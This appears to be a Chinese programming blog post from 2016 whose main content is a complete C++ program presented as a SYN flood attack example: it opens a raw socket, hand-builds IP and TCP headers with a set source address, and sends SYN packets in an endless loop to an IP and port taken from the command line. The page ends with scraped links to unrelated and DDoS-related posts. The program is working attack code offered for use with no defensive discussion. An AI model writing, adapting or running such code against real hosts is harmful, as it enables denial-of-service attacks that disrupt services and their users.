文档章节

c++版本的syn flood攻击示例代码

m
 moodlxs
发布于 2016/12/08 17:37
字数 419
阅读 8
收藏 0
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#pragma pack(1)
struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;

    struct tcphdr tcp;
};
#pragma pack()

unsigned short csum(unsigned short *ptr, int nbytes) 
{
    long sum;
    unsigned short oddbyte;
    short answer;
    
    sum = 0;
    while (nbytes > 1) {
      sum += *ptr++;
      nbytes -= 2;
    }
    if (nbytes == 1) {
      oddbyte = 0;
      *((u_char*) &oddbyte) = *(u_char*) ptr;
      sum += oddbyte;
    }
    
    sum = (sum >> 16) + (sum & 0xffff);
    sum = sum + (sum >> 16);
    answer = (short) ~sum;
    
    return (answer);
}

void oneSyn(int socketfd, in_addr_t source, u_int16_t sourcePort,
        in_addr_t destination, u_int16_t destinationPort) 
{
    static char sendBuf[sizeof(iphdr) + sizeof(tcphdr)] = { 0 };
    bzero(sendBuf, sizeof(sendBuf));

    struct iphdr* ipHeader = (iphdr*) sendBuf;
    struct tcphdr *tcph = (tcphdr*) (sendBuf + sizeof(iphdr));

    ipHeader->version = 4;
    ipHeader->ihl = 5;

    ipHeader->tos = 0;
    ipHeader->tot_len = htons(sizeof(sendBuf));

    ipHeader->id = htons(1);
    ipHeader->frag_off = 0;
    ipHeader->ttl = 254;
    ipHeader->protocol = IPPROTO_TCP;
    ipHeader->check = 0;
    ipHeader->saddr = source;
    ipHeader->daddr = destination;

    ipHeader->check = csum((unsigned short*) ipHeader, ipHeader->ihl * 2);

    //TCP Header
    tcph->source = htons(sourcePort);
    tcph->dest = htons(destinationPort);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5; //sizeof(tcphdr)/4
    tcph->fin = 0;
    tcph->syn = 1;
    tcph->rst = 0;
    tcph->psh = 0;
    tcph->ack = 0;
    tcph->urg = 0;
    tcph->window = htons(512);
    tcph->check = 0;
    tcph->urg_ptr = 0;

    //tcp header checksum
    struct pseudo_header pseudoHeader;
    pseudoHeader.source_address = source;
    pseudoHeader.dest_address = destination;
    pseudoHeader.placeholder = 0;
    pseudoHeader.protocol = IPPROTO_TCP;
    pseudoHeader.tcp_length = htons(sizeof(tcphdr));
    memcpy(&pseudoHeader.tcp, tcph, sizeof(struct tcphdr));

    tcph->check = csum((unsigned short*) &pseudoHeader, sizeof(pseudo_header));

    struct sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(sourcePort);
    sin.sin_addr.s_addr = destination;

    ssize_t sentLen = sendto(socketfd, sendBuf, sizeof(sendBuf), 0,
            (struct sockaddr *) &sin, sizeof(sin));
    if (sentLen == -1) {
        perror("sent error");
    }
}

int main(int argc,char** argv) 
{
    char ip[128] = "127.0.0.1"; 
    uint16_t port = 6888;
    if (argc == 1) {
        printf("Usage:sf ip port\n");
        return -1;
    }

    if (argc > 1) {
        sprintf(ip, "%s", argv[1]);
    }

    if (argc > 2) {
        port = atoi(argv[2]);
    }
        
    //for setsockopt
    int optval = 1;

    //create a raw socket
    int socketfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    if (socketfd == -1) {
        perror("create socket:");
        exit(0);
    }
    if (setsockopt(socketfd, IPPROTO_IP, IP_HDRINCL, &optval, sizeof(optval)) < 0) {
        perror("create socket:");
        exit(0);
    }

    in_addr_t source = inet_addr("127.0.0.1");
    in_addr_t destination = inet_addr(ip);
    u_int16_t sourcePort = 1667;
    u_int16_t destinationPort = port;
    while(1) {
        oneSyn(socketfd, source, sourcePort++, destination, destinationPort);
        sourcePort %= 65535;
        sleep(5);
    }

    return 0;
}

 

© 著作权归作者所有

共有 人打赏支持
m
粉丝 6
博文 41
码字总数 168307
作品 0
深圳
高级程序员
私信 提问
在MFC程序中使用AnyCAD三维控件

AnyCAD三维控件有.Net版本和C++两个版本,使用C++要比C#稍微繁杂一点。SDK中提供了针对MFC的文档视图的封装,只需改一下几个基类即可。 准备 VS2010 下载C++版本的AnyCAD图形控件:http://pa...

AnyCAD三维控件
2015/05/06
0
0
DDOS攻击介绍

从昨晚的18:50分开始,每隔30分钟左右进行10G流量的ddos攻击,实在没招,只能使用阿里云的高防IP来防御。 主要的攻击是: 趁此机会,全面了解DDos攻击: (以下是总结内容来源: http://www...

robin_key
2017/05/31
0
0
详解SYN Flood攻击原理与防范

YN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,它是利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方...

wcczrx
2017/07/31
0
0
syn-proxy 之 syn-cookie 实现分析

本篇文章介绍了防范syn攻击的syn-proxy机制的原理,包含关键技术点和代码解析,供大家参考。 回顾上篇文章:SSD 优化案例:读策略优化和中断多核绑定 为什么要使用 syn-proxy linux 内核原生...

小米运维
05/10
0
0
c语言基础学习11_项目实战:IDE(集成开发环境)

============================================================================= ============================================================================= 涉及到的知识点有: 一......

黑泽明军
01/29
0
0

没有更多内容

加载失败,请刷新页面

加载更多

什么是自然语言处理技术

自然语言处理(NLP)是计算机科学,人工智能,语言学关注计算机和人类(自然)语言之间的相互作用的领域。自然语言处理是计算机科学领域与人工智能领域中的一个重要方向。它研究能实现人与计...

本宫没空2
1分钟前
0
0
移动端关闭虚拟键盘

$("#select_date").focus(function(){ document.activeElement.blur(); });

niuhongxia
1分钟前
0
0
Ubuntu18.04安装RabbitMQ(正确安装)

1、安装erlang 由于rabbitMq需要erlang语言的支持,在安装rabbitMq之前需要安装erlang sudo apt-get install erlang-nox 2、安装Rabbitmq 更新源 sudo apt-get update 安装 sudo apt-get ins...

hansonwong
10分钟前
0
0
如何在以太坊开发发行自己的ERC-20数字货币

今天我将向你展示如何在以太坊区块链上开发你自己的加密货币并将其出售!我将向你展示如何使用以太坊智能合约逐步创建自己的ERC-20代币和众筹销售,如何测试智能合约,如何将智能合约部署到以...

geek12345
11分钟前
0
0
Vlock用于有多个用户访问控制台的共享 Linux 系统

当你在共享的系统上工作时,你可能不希望其他用户偷窥你的控制台中看你在做什么。如果是这样,我知道有个简单的技巧来锁定自己的会话,同时仍然允许其他用户在其他虚拟控制台上使用该系统。 ...

linuxprobe16
11分钟前
0
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部